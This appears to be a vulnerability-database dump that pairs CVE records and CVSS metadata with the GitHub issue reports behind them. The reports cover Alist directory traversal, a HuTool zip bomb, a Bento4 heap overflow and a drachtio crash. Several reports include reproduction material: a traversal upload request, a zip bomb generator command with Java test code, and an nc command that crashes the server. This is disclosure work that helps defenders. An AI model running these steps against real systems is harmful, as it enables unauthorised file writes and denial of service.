- And try to upload a file, catch the package and modified the 'File-path' parameter with '../'
<img width="1335" alt="image" src="https://user-images.githubusercontent.com/52377340/203327417-a5779f10-f988-4840-b8b3-19b64ab042d8.png">
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203327461-9710f05d-a485-4c40-9bcb-0a76a3fb833d.png">
- Send the package, and login as 'admin' to check out the '/testPasswd'. Will find out that the file has been uploaded successfully.
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203327673-cc45becf-7b91-4a70-b5da-1e0473ff94c0.png">
### Reproduction / 复现链接
Package:
PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
Content-Length: 30530
Accept: application/json, text/plain, */*
As-Task: false
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg_-rzQ7hf5tbbsy4RSVc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
**File-Path: ..%2ftestPasswd%2ftestDirectoryTraversal**
Content-Type: application/octet-stream
Origin: http://192.168.31.148:52000
Referer: http://192.168.31.148:52000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
PNG
### Logs / 日志
```shell
None
```
| Directory traversal file upload vulnerability | https://api.github.com/repos/AlistGo/alist/issues/2449/comments | 4 | 2022-11-22T13:37:32Z | 2022-12-13T10:58:21Z | https://github.com/AlistGo/alist/issues/2449 | 1,459,889,918 | 2,449 | 4,520 |
CVE-2022-4565 | 2022-12-16T19:15:08.977 | A vulnerability classified as problematic was found in Dromara HuTool up to 5.8.10. This vulnerability affects unknown code of the file cn.hutool.core.util.ZipUtil.java. The manipulation leads to resource consumption. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.8.11 is able to address this issue. It is recommended to upgrade the affected component. VDB-215974 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2797"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.215974"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2797"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.215974"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hutool:hutool:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3A7EDB42-B636-4882-A37C-98B85DF1A973",
"versionEndExcluding": null,
"versionEndIncluding": "5.8.10",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"404"
] | 404 | https://github.com/dromara/hutool/issues/2797 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"dromara",
"hutool"
] | # 测试
JDK版本: jdk_8_291
hutool版本: 全版本
# 问题描述
## 中文
### 漏洞描述
hutool中存在zip bomb漏洞,此漏洞发生在zip解压时, zip炸弹文件中有大量刻意重复的数据,这种重复数据在压缩的时候是可以被丢弃的,这也就是压缩后的文件其实并不大的原因,但是当解压后,文件会变得非常大,通过脚本(https://github.com/CreeperKong/zipbomb-generator)
可以生成可利用的zip文件,如下图:

也就是说42KB的压缩包解压后大小为5.5G,10MB的压缩包解压后大小为281TB,46MB的压缩包解压后大小为4.5PB。
在HuTool组件中,未对上述情况做严格的防护,从而导致消耗服务器统存储资源,导致拒绝服务等情况发生。
### 漏洞影响
影响版本:release version 4.4.2 - release version 5.8.10
影响危害:消耗服务器统存储资源,导致拒绝服务等情况发生
### 漏洞发现
漏洞发生在cn.hutool.core.util.ZipUtil.java文件中。
如下方法未做任何防护:
1. cn.hutool.core.util.ZipUtil#unzip(java.lang.String)
2. cn.hutool.core.util.ZipUtil#unzip(java.lang.String, java.nio.charset.Charset)
3. cn.hutool.core.util.ZipUtil#unzip(java.io.File)
4. cn.hutool.core.util.ZipUtil#unzip(java.io.File, java.nio.charset.Charset)
5. cn.hutool.core.util.ZipUtil#unzip(java.lang.String, java.lang.String)
6. cn.hutool.core.util.ZipUtil#unzip(java.lang.String, java.lang.String, java.nio.charset.Charset)
7. cn.hutool.core.util.ZipUtil#unzip(java.io.File, java.io.File)
8. cn.hutool.core.util.ZipUtil#unzip(java.io.File, java.io.File, java.nio.charset.Charset)
9. cn.hutool.core.util.ZipUtil#unzip(java.util.zip.ZipFile, java.io.File)
10. cn.hutool.core.util.ZipUtil#unzip(java.io.InputStream, java.io.File, java.nio.charset.Charset)
11. cn.hutool.core.util.ZipUtil#unzip(java.util.zip.ZipInputStream, java.io.File)
上述11个方法最后都会调用cn.hutool.core.util.ZipUtil#unzip(java.util.zip.ZipFile, java.io.File, long)方法,但是第三个参数为-1L,如下图

继续跟进cn.hutool.core.util.ZipUtil#unzip(java.util.zip.ZipFile, java.io.File, long)

如上图可以看到limit参数的作用是为了防止文件过大,但是前面提到的11中方法传入的limit参数值为-1L,因此不会检测压缩文件是否过大。
另外,计算文件大小采用zipEntry.getSize()方法,而size值可以在zip文件中伪造,从而逃过上述代码的检测,具体伪造方式可参考:https://blog.csdn.net/fenwangduanyan/article/details/112969329
jadx项目也发生过此漏洞:https://github.com/skylot/jadx/issues/980
### 漏洞复现
HuTool中的zip bomb可分为两类:
1. 第一类是上文中列出的11种方法,没有检测文件是否过大;
2. 第二类是直接调用cn.hutool.core.util.ZipUtil#unzip(java.util.zip.ZipFile, java.io.File, long)方法,且指定了第三个参数值,这种则需要伪造zip数据包中的size value。
这里仅仅展示第一类利用方式,具体如下:
利用此项目代码:https://github.com/CreeperKong/zipbomb-generator 生成恶意恶意压缩文件,运行`python zipbomb.py --mode=quoted_overlap --alphabet ABCDEFGHIJKLMNOPQRSTUVWXYZ --num-files=500 --compressed-size=1000000 > tgao.zip`,即可生成1019kb的压缩文件

编写如下java代码:
```java
import cn.hutool.core.util.ZipUtil;
public class ZipBombTest {
public static void main(String[] args) {
ZipUtil.unzip("D:/download/zipbomb-generator-master/tgao.zip",
"D:/download/zipbomb-generator-master/tgao");
}
}
```
运行上述java代码,解压后的文件夹大小如下:

即1019kb的压缩文件解压后16.6GB,实际大于这个值,因为我的磁盘已经装不下更多的空间了。

### 修复建议
1. 参考jadx项目的修复方式:https://github.com/skylot/jadx/commit/9b1761f71f043e0a9b2030a9263bdc00a1971d2a
2. 设置一个解压后文件大小默认值或者一个压缩文件解压后和解压前所占空间的比例默认值,如果超过默认值,则进行回滚操作,删除已解压的文件
## English
### Description
zip bomb vulnerability exists in hutool. This vulnerability occurs when zip is decompressed. There are a lot of deliberately repeated data in the zip bomb file, which can be discarded during compression. Through script (https://github.com/CreeperKong/zipbomb-generator),
A usable zip file can be generated, as shown below:

In other words, the size of the 42KB package is 5.5 GB, that of the 10MB package is 281TB, and that of the 46MB package is 4.5PB.
The HuTool component does not strictly protect against the preceding situations. As a result, the storage resources of the server are consumed and service denial occurs.
### Impact
Affected versions: release version 4.4.2 - release version 5.8.10
Impact Damage: The storage resources of the server are consumed, resulting in denial of service
### Code Audit
vulnerability in cn.Hutool.Core.Util.ZipUtil.Java file.
The following methods do not have any protection:
1. cn.hutool.core.util.ZipUtil#unzip(java.lang.String)
2. cn.hutool.core.util.ZipUtil#unzip(java.lang.String, java.nio.charset.Charset)
5. cn.hutool.core.util.ZipUtil#unzip(java.io.File)
6. cn.hutool.core.util.ZipUtil#unzip(java.io.File, java.nio.charset.Charset)
7. cn.hutool.core.util.ZipUtil#unzip(java.lang.String, java.lang.String)
8. cn.hutool.core.util.ZipUtil#unzip(java.lang.String, java.lang.String, java.nio.charset.Charset)
9. cn.hutool.core.util.ZipUtil#unzip(java.io.File, java.io.File)
10. cn.hutool.core.util.ZipUtil#unzip(java.io.File, java.io.File, java.nio.charset.Charset)
11. cn.hutool.core.util.ZipUtil#unzip(java.util.zip.ZipFile, java.io.File)
12. cn.hutool.core.util.ZipUtil#unzip(java.io.InputStream, java.io.File, java.nio.charset.Charset)
13. cn.hutool.core.util.ZipUtil#unzip(java.util.zip.ZipInputStream, java.io.File)
The above 11 method finally call the cn.Hutool.Core.Util.ZipUtil#unzip(Java.Util.Zip.ZipFile, Java.IO.File, long) method, but the third parameter to -1L, As shown below:

Continue to follow up the cn.hutool.core.util.ZipUtil#unzip(java.util.zip.ZipFile, java.io.File, long)

As you can see in the figure above, the limit parameter is used to prevent the file from being too large, but the previous method in 11 passed the limit parameter as -1L, so it does not detect if the compressed file is too large.
In addition, the zipEntry.getSize() method is used to calculate the file size, and the size value can be forged in the zip file, so as to escape the detection of the above code.
For details, please refer to: https://blog.csdn.net/fenwangduanyan/article/details/112969329
This vulnerability also occurred on the jadx project:https://github.com/skylot/jadx/issues/980
### Steps to reproduce
zip bombs in HuTool fall into two categories:
1. The first type is the 11 methods listed above, which does not detect whether the file is too large;
2. The second type is called directly cn.Hutool.Core.Util.ZipUtil#unzip(Java.Util.Zip.ZipFile, Java.IO.File, long)method, and specifies the third parameter values, In this case, The attacker can fake the size value in the zip packet.
Only the first type of utilization is shown here, specifically as follows:
Using the project code (https://github.com/CreeperKong/zipbomb-generator) to generate malicious malicious compressed file, Run `python zipbomb.py --mode=quoted_overlap --alphabet ABCDEFGHIJKLMNOPQRSTUVWXYZ --num-files=500 --compressed-size=1000000 > tgao.zip` to generate the compressed file of 1019kb.

Write the following java code:
```java
import cn.hutool.core.util.ZipUtil;
public class ZipBombTest {
public static void main(String[] args) {
ZipUtil.unzip("D:/download/zipbomb-generator-master/tgao.zip",
"D:/download/zipbomb-generator-master/tgao");
}
}
```
Run the above java code and the size of the extracted folder is as follows:

That's 16.6GB for a 1019kb zip file, which is more than that, because I can't fit any more space on my disk.

### Bug Repair Suggestions
1. Refer to the repair method of jadx project: https://github.com/skylot/jadx/commit/9b1761f71f043e0a9b2030a9263bdc00a1971d2a
2. Set a default value for the size of the decompressed file or the ratio of the space occupied by the decompressed file to the space occupied by the decompressed file. If the ratio exceeds the default value, the decompressed file is rolled back to delete the decompressed file.
| ZIP bomb vulnerability in HuTool | https://api.github.com/repos/chinabugotech/hutool/issues/2797/comments | 6 | 2022-12-12T07:13:25Z | 2023-06-05T22:25:09Z | https://github.com/chinabugotech/hutool/issues/2797 | 1,491,166,936 | 2,797 | 4,521 |
CVE-2022-4584 | 2022-12-17T13:15:09.483 | A vulnerability was found in Axiomatic Bento4 up to 1.6.0-639. It has been rated as critical. Affected by this issue is some unknown functionality of the component mp42aac. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-216170 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/files/10095915/POC2.tar.gz"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/818"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.216170"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.216170"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/files/10095915/POC2.tar.gz"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/818"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.216170"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.216170"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*",
"matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0-639",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"122"
] | 122 | https://github.com/axiomatic-systems/Bento4/issues/818 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | Hi, developers of Bento4:
When I tested the latest mp42aac, the following crash occurred.
## The problem
The optput of mp42aac_asan:
```
==115490==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ee71 at pc 0x000000509921 bp 0x7fffffffd410 sp 0x7fffffffd400
READ of size 1 at 0x60200000ee71 thread T0
#0 0x509920 in AP4_Stz2Atom::AP4_Stz2Atom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4Stz2Atom.cpp:113
#1 0x509ac6 in AP4_Stz2Atom::Create(unsigned int, AP4_ByteStream&) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4Stz2Atom.cpp:52
#2 0x46efde in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:483
#3 0x472452 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#4 0x472452 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
#5 0x40bd11 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4File.cpp:104
#6 0x40bd11 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4File.cpp:78
#7 0x402a40 in main /home/xxzs/workdir/test/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250
#8 0x7ffff621f83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#9 0x4045d8 in _start (/home/xxzs/workdir/test/mp42aac/mp42aac_asan+0x4045d8)
0x60200000ee71 is located 0 bytes to the right of 1-byte region [0x60200000ee70,0x60200000ee71)
allocated by thread T0 here:
#0 0x7ffff6f036b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2)
#1 0x509235 in AP4_Stz2Atom::AP4_Stz2Atom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4Stz2Atom.cpp:101
#2 0x509ac6 in AP4_Stz2Atom::Create(unsigned int, AP4_ByteStream&) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4Stz2Atom.cpp:52
#3 0x46efde in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:483
#4 0x472452 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#5 0x472452 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
#6 0x40bd11 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4File.cpp:104
#7 0x40bd11 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4File.cpp:78
#8 0x402a40 in main /home/xxzs/workdir/test/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250
#9 0x7ffff621f83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4Stz2Atom.cpp:113 AP4_Stz2Atom::AP4_Stz2Atom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&)
Shadow bytes around the buggy address:
0x0c047fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[01]fa
0x0c047fff9dd0: fa fa fd fa fa fa 00 04 fa fa fd fa fa fa fd fa
0x0c047fff9de0: fa fa fd fa fa fa 00 04 fa fa fd fa fa fa fd fa
0x0c047fff9df0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==115490==ABORTING
[Inferior 1 (process 115490) exited with code 01]
```
The output of gdb:
```
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./mp42aac...done.
(gdb) set args /home/xxzs/workdir/test/mp42aac/out/afl-slave/crashes/id:000239,sig:06,src:000523+002959,op:splice,rep:2 /dev/null
(gdb) r
Starting program: /home/xxzs/workdir/test/mp42aac/mp42aac /home/xxzs/workdir/test/mp42aac/out/afl-slave/crashes/id:000239,sig:06,src:000523+002959,op:splice,rep:2 /dev/null
Program received signal SIGSEGV, Segmentation fault.
AP4_Stz2Atom::AP4_Stz2Atom (this=0x6b5bb0, size=<optimized out>, version=<optimized out>,
flags=<optimized out>, stream=...)
at /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4Stz2Atom.cpp:113
113 m_Entries[i] = (buffer[i/2]>>4)&0x0F;
(gdb) bt
#0 AP4_Stz2Atom::AP4_Stz2Atom (this=0x6b5bb0, size=<optimized out>, version=<optimized out>,
flags=<optimized out>, stream=...)
at /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4Stz2Atom.cpp:113
#1 0x000000000045b112 in AP4_Stz2Atom::Create (size=28, stream=...)
at /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4Stz2Atom.cpp:52
#2 0x00000000004268b5 in AP4_AtomFactory::CreateAtomFromStream (this=0x7fffffffdc70, stream=...,
type=1937013298, size_32=28, size_64=28, atom=@0x7fffffffdc60: 0x0)
at /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:483
#3 0x00000000004283c6 in AP4_AtomFactory::CreateAtomFromStream (atom=@0x7fffffffdc60: 0x0,
bytes_available=<synthetic pointer>, stream=..., this=0x7fffffffdc70)
at /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#4 AP4_AtomFactory::CreateAtomFromStream (this=this@entry=0x7fffffffdc70, stream=...,
atom=@0x7fffffffdc60: 0x0) at /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
#5 0x0000000000403e12 in AP4_File::ParseStream (moov_only=<optimized out>, atom_factory=...,
stream=..., this=<optimized out>) at /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4File.cpp:104
#6 AP4_File::AP4_File (this=0x6b5610, stream=..., moov_only=false)
at /home/xxzs/workdir/test/Bento4/Source/C++/Core/Ap4File.cpp:78
#7 0x000000000040134f in main (argc=<optimized out>, argv=<optimized out>)
at /home/xxzs/workdir/test/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250
(gdb) list
108 m_Entries.SetItemCount((AP4_Cardinal)sample_count);
109 switch (m_FieldSize) {
110 case 4:
111 for (unsigned int i=0; i<sample_count; i++) {
112 if ((i%2) == 0) {
113 m_Entries[i] = (buffer[i/2]>>4)&0x0F;
114 } else {
115 m_Entries[i] = buffer[i/2]&0x0F;
116 }
117 }
```
## Crash input
[POC2.tar.gz](https://github.com/axiomatic-systems/Bento4/files/10095915/POC2.tar.gz)
## Validation steps
1. build the latest mp42aac
2. ./mp42aac ./POC2 /dev/null
## Environment
* Host Operating System and version: Ubuntu 16.04 LTS
* Host CPU architecture: 11th Gen Intel® Core™ i5-11500 @ 2.70GHz × 8
* gcc version: 5.4.0
| heap-buffer-overflow in mp42aac | https://api.github.com/repos/axiomatic-systems/Bento4/issues/818/comments | 0 | 2022-11-26T08:35:48Z | 2023-05-29T02:39:18Z | https://github.com/axiomatic-systems/Bento4/issues/818 | 1,465,089,664 | 818 | 4,522 |
CVE-2022-47516 | 2022-12-18T05:15:11.200 | An issue was discovered in the libsofia-sip fork in drachtio-server before 0.8.20. It allows remote attackers to cause a denial of service (daemon crash) via a crafted UDP message that leads to a failure of the libsofia-sip-ua/tport/tport.c self assertion. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/davehorton/sofia-sip/commit/13b2a135287caa2d67ac6cd5155626821e25b377"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/drachtio/drachtio-server/issues/244"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/02/msg00028.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5410"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/davehorton/sofia-sip/commit/13b2a135287caa2d67ac6cd5155626821e25b377"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/drachtio/drachtio-server/issues/244"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/02/msg00028.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5410"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:drachtio:drachtio-server:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BE06DCDE-7FE0-4BAB-9130-985502E95875",
"versionEndExcluding": "0.8.20",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/drachtio/drachtio-server/issues/244 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"drachtio",
"drachtio-server"
] | Hi,
the following remote request is able to crash drachtio:
```
nc -w 5 -u PUBLIC_IP 5060 < file
drachtio: tport.c:3313: tport_tsend: Assertion `self' failed.
```
A bit of backtrace here:
```
Thread 1 "drachtio" received signal SIGABRT, Aborted.
0x00007ffff6cc9ce1 in raise () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0 0x00007ffff6cc9ce1 in raise () from /lib/x86_64-linux-gnu/libc.so.6
#1 0x00007ffff6cb3537 in abort () from /lib/x86_64-linux-gnu/libc.so.6
#2 0x00007ffff6cb340f in ?? () from /lib/x86_64-linux-gnu/libc.so.6
#3 0x00007ffff6cc2662 in __assert_fail () from /lib/x86_64-linux-gnu/libc.so.6
#4 0x0000000000a2852c in tport_tsend (self=0x0, msg=msg@entry=0x619000013180, _tpn=<optimized out>, tag=<optimized out>, value=-1) at tport.c:3313
#5 0x00000000009a2345 in nta_msg_tsend (agent=<optimized out>, msg=msg@entry=0x619000013180, u=u@entry=0x0, tag=tag@entry=0x0, value=value@entry=0) at nta.c:3748
#6 0x00000000004c8528 in drachtio::DrachtioController::processMessageStatelessly (this=<optimized out>, msg=<optimized out>, sip=<optimized out>) at ../src/controller.cpp:1571
#7 0x00000000004ce7dc in (anonymous namespace)::stateless_callback (controller=<optimized out>, agent=<optimized out>, msg=<optimized out>, sip=<optimized out>)
